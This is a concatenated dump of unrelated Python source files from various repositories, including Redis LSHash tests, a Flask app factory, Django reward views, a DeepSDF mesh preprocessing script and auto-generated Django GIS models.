    def test_lshash_redis_extra_val(self):
        """Redis-backed variant of test_lshash_extra_val (vector + name
        payloads, duplicate insertions prevented).
        """
        config = {"redis": {"host": 'localhost', "port": 6379, "db": 15}}
        sr = StrictRedis(**config['redis'])
        sr.flushdb()
        lsh = LSHash(6, 8, 1, config)
        for i in range(self.num_elements):
            lsh.index(list(self.els[i]), self.el_names[i])
            lsh.index(list(self.els[i]), self.el_names[i]) # multiple insertions
        hasht = lsh.hash_tables[0]
        itms = [hasht.get_list(k) for k in hasht.keys()]
        for itm in itms:
            assert itms.count(itm) == 1
            for el in itm:
                assert el[0] in self.els
                assert el[1] in self.el_names
        for el in self.els:
            res = lsh.query(list(el), num_results=1, distance_func='euclidean')[0]
            # vector and name are in the first element of the tuple res[0]
            el_v, el_name = res[0]
            # the distance is in the second element of the tuple
            el_dist = res[1]
            assert el_v in self.els
            assert el_name in self.el_names
            assert el_dist == 0
        del lsh
        sr.flushdb()
| 2.859375 | 3 |
tests/test_api.py | korvyashka/pykongregate | 0 | 12761028 | from unittest import TestCase
from mock import patch
from pykongregate.api import _handle_request
from pykongregate.exceptions import NullResponseException
class TestApi(TestCase):
    """Unit tests for _handle_request with requests.get patched out."""
    def test_base_request(self):
        """An empty response body must raise NullResponseException; a JSON
        body must be parsed and returned as a dict."""
        with patch('requests.get') as patch_get:
            # Minimal stand-in for a requests.Response with an empty body.
            class _Temp(object):
                def __init__(self):
                    self.text = ''
            patch_get.side_effect = [_Temp()]
            url = 'www.example.com'
            self.assertRaises(
                NullResponseException,
                _handle_request,
                url, {},
            )
        with patch('requests.get') as patch_get:
            # Stand-in response carrying a valid JSON body.
            class _Temp(object):
                def __init__(self):
                    self.text = '{"hello_world": "hello_world"}'
            patch_get.side_effect = [_Temp()]
            url = 'www.example.com'
            params = {}
            response = _handle_request(url, params)
            self.assertEqual(
                response, {"hello_world": "hello_world"}
            )
| 2.671875 | 3 |
chap03/author-manager/src/main.py | matadorchw/rest_flask | 2 | 12761029 | import logging
import sys
from flask import Flask, send_from_directory, jsonify
from flask_jwt_extended import JWTManager
from api.utils.database import db
from api.utils.responses import response_with
import api.utils.responses as resp
from api.utils.email import mail
from api.routes.authors import author_routes
from api.routes.books import book_routes
from api.routes.users import user_routes
from flask_swagger import swagger
from flask_swagger_ui import get_swaggerui_blueprint
def create_app(config):
    """Application factory: build and configure the Flask app.

    Registers the author/book/user blueprints, the Swagger UI, an avatar
    file route, error handlers and the /api/spec endpoint; then initialises
    JWT, mail and the database (creating all tables) and sets up logging.
    """
    app = Flask(__name__)
    app.config.from_object(config)
    app.register_blueprint(author_routes, url_prefix='/api/authors')
    app.register_blueprint(book_routes, url_prefix='/api/books')
    app.register_blueprint(user_routes, url_prefix='/api/users')
    SWAGGER_URL = '/api/docs'
    swaggerui_blueprint = get_swaggerui_blueprint('/api/docs', '/api/spec',
                                                  config={
                                                      'app_name': "Flask Author DB"})
    app.register_blueprint(swaggerui_blueprint, url_prefix=SWAGGER_URL)
    @app.route('/avatar/<filename>')
    def uploaded_file(filename):
        # Serve stored avatar images from the configured upload folder.
        return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
    @app.after_request
    def add_header(response):
        # Hook kept as an extension point; currently passes responses through.
        return response
    @app.errorhandler(400)
    def bad_request(e):
        logging.error(e)
        return response_with(resp.BAD_REQUEST_400)
    @app.errorhandler(500)
    def server_error(e):
        logging.error(e)
        return response_with(resp.SERVER_ERROR_500)
    @app.errorhandler(404)
    def not_found(e):
        logging.error(e)
        return response_with(resp.SERVER_ERROR_404)
    @app.route('/api/spec')
    def spec():
        # Swagger spec generated from the registered routes.
        swag = swagger(app, prefix='/api')
        swag['info']['base'] = "http://localhost:5000"
        swag['info']['version'] = "1.0"
        swag['info']['title'] = "Flask Author DB"
        return jsonify(swag)
    jwt = JWTManager(app)
    mail.init_app(app)
    db.init_app(app)
    with app.app_context():
        # Create any missing tables at startup.
        db.create_all()
    logging.basicConfig(stream=sys.stdout,
                        format='%(asctime)s|%(levelname)s|%(filename)s:%(lineno)s|%(message)s',
                        level=logging.DEBUG)
    return app
if __name__ == '__main__':
    import os
    from api.config.config import ProductionConfig, TestingConfig, \
        DevelopmentConfig

    # Select the configuration class from the WORK_ENV environment
    # variable, falling back to the development configuration.
    config_by_env = {
        'PROD': ProductionConfig,
        'TEST': TestingConfig,
    }
    work_env = os.environ.get('WORK_ENV')
    app_config = config_by_env.get(work_env, DevelopmentConfig)
    app = create_app(app_config)
    app.run(port=5000, host='0.0.0.0', use_reloader=True)
| 2.25 | 2 |
rewards/views.py | Ananth3A1/casuper25 | 1 | 12761030 | from django.http import Http404
from django.shortcuts import render, redirect
from users.models import Profile, Team
from .forms import MultiBadgeForm
from django.contrib.auth.decorators import login_required
from .models import Points
from webpages.models import Banner, Visibility
from webpages.utils import return_camp_id
@login_required
def give_award(request):
    """Superuser-only view for granting award points to users or a team.

    GET renders an empty form; a valid POST creates one ``Points`` row per
    selected user (or a single row for the selected team) and redirects
    back to the form.  Non-superusers get a 404.
    """
    if not request.user.is_superuser:
        raise Http404()
    if request.method == 'GET':
        form = MultiBadgeForm()
        return render(request, 'award/give_award.html', context={'form': form})
    form = MultiBadgeForm(request.POST)
    if form.is_valid():
        users = form.cleaned_data.get('users')
        teams = form.cleaned_data.get('teams')
        heading = form.cleaned_data.get('heading')
        pr_type = form.cleaned_data.get('type')
        points = form.cleaned_data.get('points')
        show = form.cleaned_data.get('show')
        if len(users) != 0:
            # One Points record per selected user.
            for user in users:
                Points.objects.create(user=user, heading=heading, type=pr_type, points=points, show=show)
        elif teams:
            Points.objects.create(team=teams, heading=heading, type=pr_type, points=points, show=show)
        return redirect('give_award')
    # BUGFIX: an invalid form previously fell through and returned None,
    # which Django turns into a 500; re-render with validation errors.
    return render(request, 'award/give_award.html', context={'form': form})
# display the list of points given including only top 3
def award_list(request, camp):
    """Render the public list of visible awards for a camp."""
    camp_id = return_camp_id(camp)
    # Only awards flagged `show` are listed; split them into per-user
    # awards (no team) and per-team awards (no user).
    visible = Points.objects.filter(show=True, camp=camp_id)
    user_awards = visible.filter(team=None)
    team_awards = visible.filter(user=None)
    page_visibility = Visibility.objects.filter(camp=camp_id).first()
    page_banner = Banner.objects.filter(camp=camp_id).first()
    context = {
        "teams": team_awards,
        'users': user_awards,
        'display': page_visibility.awards,
        'banner': page_banner.awards,
        'camp_id': camp_id,
        'title': f'{camp.upper()} AWARD LIST'
    }
    return render(request, 'award/award_list.html', context=context)
# show the leaderboard of teams and profiles use points in corresponding models to order
def leaderboard(request, camp):
    """Render the top-10 profile/team leaderboards for a camp.

    If the viewer belongs to a team, also show a member-by-member
    breakdown of that team.
    """
    camp_id = return_camp_id(camp)
    team_profiles = ""
    team_points = ""
    top_profiles = Profile.objects.filter(camps=camp_id).order_by('-points')[:10]
    top_teams = Team.objects.filter(camp=camp_id).order_by("-team_points")[:10]
    viewer_team = request.user.profile.team
    if viewer_team:
        team_profiles = Profile.objects.filter(team=viewer_team).order_by('-points')
        team_points = Team.objects.get(id=viewer_team.id)
    page_visibility = Visibility.objects.filter(camp=camp_id).first()
    page_banner = Banner.objects.filter(camp=camp_id).first()
    context = {
        'profiles': top_profiles,
        'teams': top_teams,
        'team_profiles': team_profiles,
        'team_details': team_points,
        'display': page_visibility.leaderboard,
        'banner': page_banner.leaderboard,
        'camp_id': camp_id,
        'title': f'{camp.upper()} LEADERBOARD'
    }
    return render(request, 'award/leaderboard.html', context=context)
| 2.109375 | 2 |
deepclaw/driver/arms/Inverse_Kinematics/ikpy/logs.py | Nokkxz/ME336-Yellow-Team-Project | 5 | 12761031 | # coding= utf8
# Package-wide logger for ikpy: messages go to a stream handler (stderr by
# default) and only warnings and above are emitted unless raised via
# set_log_level().
import logging

logger = logging.getLogger("ikpy")
stream_handler = logging.StreamHandler()
logger.addHandler(stream_handler)
logger.setLevel(logging.WARNING)


def set_log_level(level):
    """Set the verbosity of the ikpy logger (e.g. ``logging.DEBUG``)."""
    logger.setLevel(level)
| 2.3125 | 2 |
sentence-reading/question_respondent.py | michalovsky/knowlegde-based-ai-mini-projects | 0 | 12761032 | <reponame>michalovsky/knowlegde-based-ai-mini-projects
from question_frame import QuestionFrame
from sentence_frame import SentenceFrame
def answer_question_about_sentence(question_frame: QuestionFrame, sentence_frame: SentenceFrame) -> str:
    """Answer a parsed question using the facts extracted from a sentence.

    Dispatches on the leading question word (Who/What/How/Where/"time")
    and returns the matching slot from the sentence frame, or "" when no
    rule applies.
    """
    words = question_frame.question_words

    if "Who" in words:
        if len(words) == 1:
            return sentence_frame.subjects[0]
        if "with" in words:
            # Return whichever of the two subjects the question did not mention.
            first = sentence_frame.subjects[0]
            second = sentence_frame.subjects[1]
            return second if first in question_frame.subjects else first
        if "to" in words:
            return sentence_frame.recipient or sentence_frame.subjects[0]

    if "What" in words:
        if len(words) > 1 and len(sentence_frame.noun_adjectives) > 0:
            return sentence_frame.noun_adjectives[0]
        if sentence_frame.noun is None:
            return " ".join(sentence_frame.subjects)
        return sentence_frame.noun

    if "How" in words:
        if len(words) == 1:
            return sentence_frame.verb
        if "far" in words:
            return sentence_frame.noun
        if "much" in words:
            return sentence_frame.quantities
        return sentence_frame.noun_adjectives[0]

    if "Where" in words:
        return sentence_frame.location
    if "time" in words:
        return sentence_frame.time

    return ""
display-stuff/neopixels/text/text/testText.py | flashypepo/myMicropython-Examples | 3 | 12761033 | <filename>display-stuff/neopixels/text/text/testText.py
# testText.py - test fontbitmap and font5*8.bin
# 2017_0206 PePo new, it doesnot work. Font too big (5*8?) for Featherwing Neopixel
# GitHub: https://github.com/adafruit/micropython-adafruit-bitmap-font/releases
import neopixel
import machine
# 2016_0206: Featherwing NeoPixel connected to Feather Huzzah ESP8266 at GPIO15
# Geometry of the NeoPixel FeatherWing: 8 columns x 4 rows.
DISPLAY_WIDTH = 8
DISPLAY_HEIGTH = 4  # NOTE(review): typo for DISPLAY_HEIGHT, kept as-is
DIN_PIN = 15  # data-in GPIO on the Feather Huzzah ESP8266
matrix = neopixel.NeoPixel(machine.Pin(DIN_PIN, machine.Pin.OUT), DISPLAY_WIDTH * DISPLAY_HEIGTH)

# pixel function
def matrix_pixel(x, y, color):
    # Map an (x, y) coordinate onto the flat NeoPixel strip index.
    # NOTE(review): the author reports that a row stride of 8 raised
    # IndexError and a stride of 4 draws the wrong glyph -- the physical
    # wiring order of this 8x4 panel is unconfirmed, so neither mapping
    # below is known to be correct.
    #matrix[y * 8 + x] = color #ERROR: index out of range
    matrix[y * 4 + x] = color #wrong character

# create bitmapfont
import bitmapfont
bf = bitmapfont.BitmapFont(8, 4, matrix_pixel)
bf.init()
# draw some text
bf.text('1', 0, 0, (50, 0, 50))  # draw character '1' in dim purple
matrix.write()  # push the frame buffer out to the LEDs
| 2.59375 | 3 |
dodo_commands/extra/dodo_standard_commands/autostart.py | mnieber/dodo-commands | 8 | 12761034 | import os
from argparse import ArgumentParser
from dodo_commands import Dodo
def _args():
    """Build the CLI parser and return the arguments parsed by Dodo."""
    description = (
        "Writes (or removes) a small script that activates the latest "
        "Dodo Commands project"
    )
    arg_parser = ArgumentParser(description=description)
    arg_parser.add_argument("status", choices=["on", "off"])
    return Dodo.parse_args(arg_parser)
if Dodo.is_main(__name__, safe=False):
    args = _args()
    # One autostart snippet per supported shell: (shell name, command
    # prefix that activates the latest project in that shell's syntax).
    shell_commands = (
        ("bash", "$(dodo env --latest --shell=bash) &&"),
        ("fish", "eval (dodo env --latest --shell=fish); and"),
    )
    for shell_name, activate_prefix in shell_commands:
        conf_dir = os.path.expanduser("~/.config/%s/conf.d" % shell_name)
        if not os.path.exists(conf_dir):
            Dodo.run(["mkdir", "-p", conf_dir])
        script_path = os.path.join(conf_dir, "dodo_autostart." + shell_name)
        script_exists = os.path.exists(script_path)
        if args.status == "on" and not script_exists:
            contents = (
                "# NOTE: automatically generated file, don't edit.\n"
                + "%s dodo check-version --dodo --config\n" % activate_prefix
            )
            with open(script_path, "w") as f:
                f.write(contents)
        elif args.status == "off" and script_exists:
            os.unlink(script_path)
| 2.71875 | 3 |
src/netbox_example/tables.py | steffann/netbox-example-plugin | 4 | 12761035 | <gh_stars>1-10
from django_tables2 import LinkColumn, TemplateColumn
from utilities.tables import BaseTable, ToggleColumn
from .models import DeviceExample, Example
#
# Examples
#
class ExampleTable(BaseTable):
    """django-tables2 table listing ``Example`` objects."""

    # Checkbox column for bulk operations.
    pk = ToggleColumn()
    # Per-row action buttons rendered from a template; right-aligned and
    # hidden when printing.
    actions = TemplateColumn(
        template_name='netbox_example/example_buttons.html',
        attrs={
            'td': {
                'class': 'text-right noprint'
            }
        },
        verbose_name=''
    )

    class Meta(BaseTable.Meta):
        model = Example
        fields = ('pk', 'name', 'value')
class DeviceExampleTable(BaseTable):
    """django-tables2 table listing ``DeviceExample`` objects."""

    # Checkbox column for bulk operations.
    pk = ToggleColumn()
    # Render the related device as a link to its detail page.
    device = LinkColumn()
    # Per-row action buttons rendered from a template; right-aligned and
    # hidden when printing.
    actions = TemplateColumn(
        template_name='netbox_example/deviceexample_buttons.html',
        attrs={
            'td': {
                'class': 'text-right noprint'
            }
        },
        verbose_name=''
    )

    class Meta(BaseTable.Meta):
        model = DeviceExample
        fields = ('pk', 'device', 'name')
| 2.09375 | 2 |
examples/maps.py | vpreston/jetyak-parsing | 0 | 12761036 | import numpy as np
import jetyak
import jviz
import sensors
import shapefile
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import utm
from mpl_toolkits.basemap import Basemap
import mpl_toolkits.basemap as mb
from scipy import stats
def lat2str(deg):
    """Format a decimal-degree latitude as ``D$\degree$ M' N|S`` (TeX markup).

    E.g. ``45.5`` -> ``45$\degree$ 30' N`` and ``-45.5`` -> ``45$\degree$ 30' S``.
    """
    minutes = 60 * (deg - np.floor(deg))
    deg = np.floor(deg)
    hemi = 'N'
    if deg < 0:
        # floor() rounds toward -inf, so pull the degree back up and make
        # the minutes negative before taking absolute values below.
        if minutes != 0.0:
            deg += 1.0
            minutes -= 60.0
        hemi = 'S'
    # BUGFIX: the hemisphere was computed but never used -- the old format
    # string hard-coded 'N', mislabeling all southern latitudes.
    return ("%d$\degree$ %g' %s") % (np.abs(deg), np.abs(minutes), hemi)
def lon2str(deg):
    """Format a decimal-degree longitude as ``D$\degree$ M' E|W`` (TeX markup).

    E.g. ``122.5`` -> ``122$\degree$ 30' E`` and ``-122.5`` -> ``122$\degree$ 30' W``.
    """
    minutes = 60 * (deg - np.floor(deg))
    deg = np.floor(deg)
    hemi = 'E'
    if deg < 0:
        # floor() rounds toward -inf, so pull the degree back up and make
        # the minutes negative before taking absolute values below.
        if minutes != 0.0:
            deg += 1.0
            minutes -= 60.0
        hemi = 'W'
    # BUGFIX: the hemisphere was computed but never used -- the old format
    # string hard-coded 'W', mislabeling all eastern longitudes.
    return ("%d$\degree$ %g' %s") % (np.abs(deg), np.abs(minutes), hemi)
if __name__ == '__main__':
    # Demo: draw a wide Mercator basemap with the blue-marble texture.
    # The commented-out blocks are alternative renderings / annotations
    # kept by the author for reference.
    #69.121595, -105.019215
    base = Basemap(llcrnrlon=-170, llcrnrlat=0, urcrnrlon=-30, urcrnrlat=80,
                   resolution='l', projection='merc', suppress_ticks=True)
    # base = Basemap(llcrnrlon=-120, llcrnrlat=68, urcrnrlon=-100, urcrnrlat=74,
    #                resolution='h', projection='merc', suppress_ticks=True)
    # base.arcgisimage(service='World_Topo_Map', xpixels=1500, verbose=True)
    base.drawcoastlines()
    base.drawcountries()
    # base.drawlakes()
    # base.fillcontinents(color='coral',lake_color='aqua')
    # base.drawlsmask(land_color='coral', ocean_color='aqua', lakes=True)
    # base.drawparallels(np.arange(-80.,81.,2.),labels=[True,True,False,False],dashes=[2,2],color='white')
    # base.drawmeridians(np.arange(-180.,181.,10.),labels=[True,True,True,False],dashes=[2,2],color='white')
    # base.drawmapboundary(fill_color='aqua')
    # base.drawrivers(linewidth=0.5, linestyle='solid', color='blue')
    # Graticule every 10 deg of latitude / 30 deg of longitude, plus a
    # single red parallel near 66N (step larger than the range draws one line).
    base.drawparallels(np.arange(-90.,91.,10.),labels=[True,True,False,False],dashes=[2,2],color='white')
    base.drawmeridians(np.arange(-180.,181.,30.),labels=[False,False,False,True],dashes=[2,2],color='white')
    base.drawparallels(np.arange(66.,67., 100.),labels=[False,False,False,True],dashes=[2,2],color='red')
    base.drawstates(linewidth=2., color='grey')
    base.bluemarble()
    plt.show()
    # base.scatter(dock_reference[1], dock_reference[0], s=500, marker='*', label='Freshwater Creek Mouth', zorder=10, edgecolor='k', facecolor='r')
    # for radius in [500*i for i in range(10)]:
    #     lats, lons = getCircle(dock_reference[0], dock_reference[1], radius)
    #     base.plot(lons, lats, c='grey')
    #     if radius == 0:
    #         pass
    #         # plt.gca().annotate('Embayment', xy=(lons[270], lats[270]+0.001), xytext=(lons[270]+0.0005, lats[270]+0.002), fontsize=22, ha='center')
    #         # plt.gca().annotate('Freshwater Creek Mouth', xy=(lons[270], lats[270]+0.0005), fontsize=10, ha='right')
    #     else:
    #         plt.gca().annotate(str(radius)+'m', xy=(lons[270], lats[270]+0.0003), fontsize=22, ha='center')
    # colors = np.flip(plt.cm.viridis(np.linspace(0,1,5)), axis=0)
    # for i, m in enumerate(jy.mission[0:5]):
    #     base.scatter(m['Longitude'], m['Latitude'], label=date_labels[i], s=1, c=colors[i], zorder=10-i, lw=0)
    # lgnd = plt.legend(loc='upper left')
    # for handle in lgnd.legendHandles[1:]:
    #     handle.set_sizes([200])
    # ax = plt.gca()
    # def xformat(x, pos=None): return lon2str(x)
    # def yformat(x, pos=None): return lat2str(x)
    # ax.xaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(xformat))
    # ax.yaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(yformat))
    # plt.show()
    # plt.close()
losses/shrinkage.py | cvpr22sub7201/SpeechDrivenTongueAnimation | 1 | 12761037 | # -*- coding: utf-8 -*-
"""
ShrinkageLoss
"""
import torch
import torch.nn as nn
class ShrinkageLoss(nn.Module):
    """Point-wise shrinkage loss for regression.

    Adaptation of the shrinkage loss from Lu et al., ECCV 2018
    (http://openaccess.thecvf.com/content_ECCV_2018/papers/Xiankai_Lu_Deep_Regression_Tracking_ECCV_2018_paper.pdf):
    the squared L2 error of each point is down-weighted through a sigmoid
    gate so that easy samples (small errors) contribute little.
    """

    def __init__(self, speed=10.0, loc=0.2, verbose=False):
        """Initialize the loss with user-defined shrinkage parameters.

        Arguments:
            speed (float): Shrinkage speed, i.e., weight assigned to hard samples.
            loc (float): Shrinkage localization, i.e., threshold for hard mining.
            verbose (bool): Accepted for API compatibility; not used here.
        """
        super(ShrinkageLoss, self).__init__()
        self.shrink_speed = speed
        self.shrink_loc = loc

    def forward(self, estimate, ground_truth):
        """Return the mean shrinkage loss between estimate and ground truth.

        Arguments:
            estimate (tensor): Estimate (MxC: M points, C channels).
            ground_truth (tensor): Ground truth with the same shape.

        Return:
            Mean per-point shrinkage loss (0-dim tensor).
        """
        # Per-point l2 error across the channel dimension.
        per_point_error = torch.norm(estimate - ground_truth, p=2, dim=1)
        # Sigmoid-style denominator: ~1 for hard points (large error),
        # large for easy points, shrinking their contribution.
        gate = 1.0 + torch.exp(
            self.shrink_speed * (self.shrink_loc - per_point_error))
        return torch.mean(per_point_error * per_point_error / gate)
release/stubs.min/Autodesk/Revit/DB/__init___parts/FloorType.py | YKato521/ironpython-stubs | 0 | 12761038 | class FloorType(HostObjAttributes, IDisposable):
""" An object that specifies the type of a floor in Autodesk Revit. """
def Dispose(self):
""" Dispose(self: Element,A_0: bool) """
pass
def getBoundingBox(self, *args):
""" getBoundingBox(self: Element,view: View) -> BoundingBoxXYZ """
pass
def ReleaseUnmanagedResources(self, *args):
""" ReleaseUnmanagedResources(self: Element,disposing: bool) """
pass
def setElementType(self, *args):
""" setElementType(self: Element,type: ElementType,incompatibleExceptionMessage: str) """
pass
def __enter__(self, *args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
IsFoundationSlab = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Returns whether the element FloorAttributes type is FoundationSlab.
Get: IsFoundationSlab(self: FloorType) -> bool
"""
StructuralMaterialId = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Returns the identifier of the material that defines the element's structural analysis properties.
Get: StructuralMaterialId(self: FloorType) -> ElementId
Set: StructuralMaterialId(self: FloorType)=value
"""
ThermalProperties = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""The calculated and settable thermal properties of the FloorType
Get: ThermalProperties(self: FloorType) -> ThermalProperties
"""
| 2.140625 | 2 |
server/processes/serializers/workflow_task_instance_execution_serializer.py | CloudReactor/task_manager | 0 | 12761039 | import logging
from rest_framework import serializers
from rest_flex_fields.serializers import FlexFieldsSerializerMixin
from ..models import WorkflowTaskInstanceExecution
from .workflow_task_instance_execution_base_serializer import WorkflowTaskInstanceExecutionBaseSerializer
from .serializer_helpers import SerializerHelpers
from .task_execution_serializer import TaskExecutionSerializer
# Module-level logger, named after this module's import path.
logger = logging.getLogger(__name__)


class WorkflowTaskInstanceExecutionSerializer(SerializerHelpers,
        FlexFieldsSerializerMixin, WorkflowTaskInstanceExecutionBaseSerializer):
    """
    WorkflowTaskInstanceExecutions hold the execution information
    for a WorkflowTaskInstance (which holds a Task) for a specific
    WorkflowExecution (run of a Workflow).
    """

    class Meta:
        model = WorkflowTaskInstanceExecution
        # Every exposed field is read-only: rows are created by the
        # workflow engine, never through this serializer.
        fields = ('uuid', 'workflow_execution',
                  'workflow_task_instance', 'task_execution',
                  'is_latest', 'created_at')
        read_only_fields = [
            'uuid', 'workflow_execution',
            'workflow_task_instance', 'task_execution',
            'is_latest', 'created_at',
        ]

    # Nested, read-only representation of the underlying task execution.
    task_execution = TaskExecutionSerializer(read_only=True)
| 2.234375 | 2 |
preprocess_dir.py | yushiangw/DeepSDF | 0 | 12761040 | <reponame>yushiangw/DeepSDF
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
import argparse
import concurrent.futures
import json
import logging
import os
import subprocess
import glob
import deep_sdf
import deep_sdf.workspace as ws
def filter_classes_glob(patterns, classes):
    """Return the classes matching any of the given glob patterns."""
    import fnmatch

    passed_classes = set()
    for pattern in patterns:
        passed_classes = passed_classes.union(
            set(filter(lambda x: fnmatch.fnmatch(x, pattern), classes))
        )
    return list(passed_classes)


def filter_classes_regex(patterns, classes):
    """Return the classes matching any of the given regular expressions."""
    import re

    passed_classes = set()
    for pattern in patterns:
        regex = re.compile(pattern)
        passed_classes = passed_classes.union(set(filter(regex.match, classes)))
    return list(passed_classes)


def filter_classes(patterns, classes):
    """Filter ``classes`` by ``patterns``.

    If the first pattern is the mode marker "glob" or "regex", the
    remaining patterns are applied in that mode; otherwise every pattern
    is treated as a glob.

    BUGFIX: the mode marker used to be stripped from ``classes`` instead
    of ``patterns`` (``classes[1:]``), silently dropping the first class
    and matching against the marker string itself.
    """
    if patterns[0] == "glob":
        return filter_classes_glob(patterns[1:], classes)
    elif patterns[0] == "regex":
        return filter_classes_regex(patterns[1:], classes)
    else:
        return filter_classes_glob(patterns, classes)
def process_mesh(mesh_filepath, target_filepath, executable, additional_args):
    """Invoke the native preprocessing binary on a single mesh.

    Blocks until the subprocess exits; its stdout is discarded.
    """
    logging.info(mesh_filepath + " --> " + target_filepath)
    command = [executable, "-m", mesh_filepath, "-o", target_filepath]
    command.extend(additional_args)
    worker = subprocess.Popen(command, stdout=subprocess.DEVNULL)
    worker.wait()
def append_data_source_map(data_dir, name, source):
    """Record ``name`` -> abspath(``source``) in the dataset's source map.

    The map is a JSON file inside ``data_dir``; re-registering an existing
    name is only allowed when it points at the same source directory.
    """
    map_filename = ws.get_data_source_map_filename(data_dir)
    print("data sources stored to " + map_filename)

    source_map = {}
    if os.path.isfile(map_filename):
        with open(map_filename, "r") as f:
            source_map = json.load(f)

    abs_source = os.path.abspath(source)
    if name in source_map:
        if not source_map[name] == abs_source:
            raise RuntimeError(
                "Cannot add data with the same name and a different source."
            )
    else:
        source_map[name] = abs_source

    with open(map_filename, "w") as f:
        json.dump(source_map, f, indent=2)
if __name__ == "__main__":
    # CLI entry point: scan --source for .ply meshes and run the native
    # PreprocessMesh_v2 binary over them in a thread pool, writing one
    # .npz per mesh into --dest_dir.
    arg_parser = argparse.ArgumentParser(
        formatter_class=argparse.RawTextHelpFormatter,
        description="Pre-processes data from a data source and append the results to "
        + "a dataset.",
    )
    arg_parser.add_argument(
        "--dest_dir",
        "-d",
        dest="dest_dir",
        required=True,
        help="The directory which holds all preprocessed data.",
    )
    arg_parser.add_argument(
        "--source",
        "-s",
        dest="source_dir",
        required=True,
        help="The directory which holds the data to preprocess and append.",
    )
    arg_parser.add_argument(
        "--skip",
        dest="skip",
        default=False,
        action="store_true",
        help="If set, previously-processed shapes will be skipped",
    )
    arg_parser.add_argument(
        "--threads",
        dest="num_threads",
        default=8,
        help="The number of threads to use to process the data.",
    )
    deep_sdf.add_common_args(arg_parser)
    args = arg_parser.parse_args()
    deep_sdf.configure_logging(args)
    # The preprocessing binary is expected next to this script.
    deepsdf_dir = os.path.dirname(os.path.abspath(__file__))
    executable = os.path.join(deepsdf_dir, "bin/PreprocessMesh_v2")
    assert os.path.exists(executable), executable
    extension = ".npz"  # NOTE(review): unused; '.npz' is hard-coded below
    # save directory
    dest_dir = args.dest_dir
    logging.info(
        "Preprocessing data from "
        + args.source_dir
        + " and placing the results in "
        + dest_dir
    )
    if not os.path.isdir(dest_dir):
        os.makedirs(dest_dir)
    #if args.surface_sampling:
    # normalization_param_dir = os.path.join(
    # args.data_dir, ws.normalization_param_subdir, args.source_name
    # )
    # if not os.path.isdir(normalization_param_dir):
    # os.makedirs(normalization_param_dir)
    #append_data_source_map(args.data_dir, args.source_name, args.source_dir)
    #class_directories = split[args.source_name]
    #
    # Build (mesh, target, args) work items for every .ply in the source.
    meshes_targets_and_specific_args = []
    #for class_dir in class_directories:
    if 1:  # placeholder for the disabled per-class loop above
        specific_args = [ '-s', '100000' , '--ft']
        flist = glob.glob( os.path.join(args.source_dir,'*.ply'))
        flist.sort()
        logging.debug( "Processing " + str(len(flist)) )
        for inst_fp in flist:
            # Target file keeps the mesh's basename with an .npz suffix.
            mid = os.path.basename(inst_fp).split('.')[0]
            processed_filepath = os.path.join(dest_dir, mid+'.npz')
            meshes_targets_and_specific_args.append(
                ( inst_fp,
                  processed_filepath,
                  specific_args,
                )
            )
    with concurrent.futures.ThreadPoolExecutor(
        max_workers=int(args.num_threads) ) as executor:
        for ( mesh_filepath,
            target_filepath,
            specific_args,
        ) in meshes_targets_and_specific_args:
            executor.submit(
                process_mesh,
                mesh_filepath,
                target_filepath,
                executable,
                specific_args ,
            )
        # NOTE(review): redundant -- the `with` block already waits and
        # shuts the executor down on exit.
        executor.shutdown()
| 2.140625 | 2 |
temp_models/trimet_gis_models.py | hackoregon/provisional-transportation-api | 2 | 12761041 | <reponame>hackoregon/provisional-transportation-api
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey has `on_delete` set to the desired behavior.
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from django.db import models
# Auto-generated (inspectdb-style) unmanaged models over TriMet GIS tables.
# NOTE(review): every CharField below declares max_length=-1, which Django's
# model validation rejects -- an artifact of introspecting unbounded text
# columns; confirm before using these models for writes or migrations.
# NOTE(review): GeometryField is not part of django.db.models (it lives in
# django.contrib.gis.db.models), so the plain `from django.db import models`
# import at the top of this file likely fails at runtime -- verify.

# TriMet service-district boundary polygon.
class TmBoundary(models.Model):
    ogc_fid = models.AutoField(primary_key=True)
    area_sq_mi = models.FloatField(blank=True, null=True)
    acres = models.FloatField(blank=True, null=True)
    wkb_geometry = models.GeometryField(blank=True, null=True)

    class Meta:
        managed = False  # table is owned by the GIS import, not Django
        db_table = 'tm_boundary'


# Park-and-ride lots.
class TmParkride(models.Model):
    ogc_fid = models.AutoField(primary_key=True)
    name = models.CharField(max_length=-1, blank=True, null=True)
    address = models.CharField(max_length=-1, blank=True, null=True)
    city = models.CharField(max_length=-1, blank=True, null=True)
    county = models.CharField(max_length=-1, blank=True, null=True)
    zipcode = models.CharField(max_length=-1, blank=True, null=True)
    owner = models.CharField(max_length=-1, blank=True, null=True)
    spaces = models.IntegerField(blank=True, null=True)
    status = models.CharField(max_length=-1, blank=True, null=True)
    wkb_geometry = models.GeometryField(blank=True, null=True)

    class Meta:
        managed = False
        db_table = 'tm_parkride'


# Rail line segments.
class TmRailLines(models.Model):
    ogc_fid = models.AutoField(primary_key=True)
    type = models.CharField(max_length=-1, blank=True, null=True)
    line = models.CharField(max_length=-1, blank=True, null=True)
    passage = models.CharField(max_length=-1, blank=True, null=True)
    status = models.CharField(max_length=-1, blank=True, null=True)
    wkb_geometry = models.GeometryField(blank=True, null=True)

    class Meta:
        managed = False
        db_table = 'tm_rail_lines'


# Rail station points.
class TmRailStops(models.Model):
    ogc_fid = models.AutoField(primary_key=True)
    station = models.CharField(max_length=-1, blank=True, null=True)
    type = models.CharField(max_length=-1, blank=True, null=True)
    line = models.CharField(max_length=-1, blank=True, null=True)
    status = models.CharField(max_length=-1, blank=True, null=True)
